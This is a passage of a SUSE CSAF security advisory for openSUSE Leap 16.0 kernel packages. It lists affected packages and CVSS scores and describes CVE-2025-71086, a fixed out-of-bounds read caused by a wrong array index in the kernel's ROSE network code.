"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
},
{
"cve": "CVE-2025-71086",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71086"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
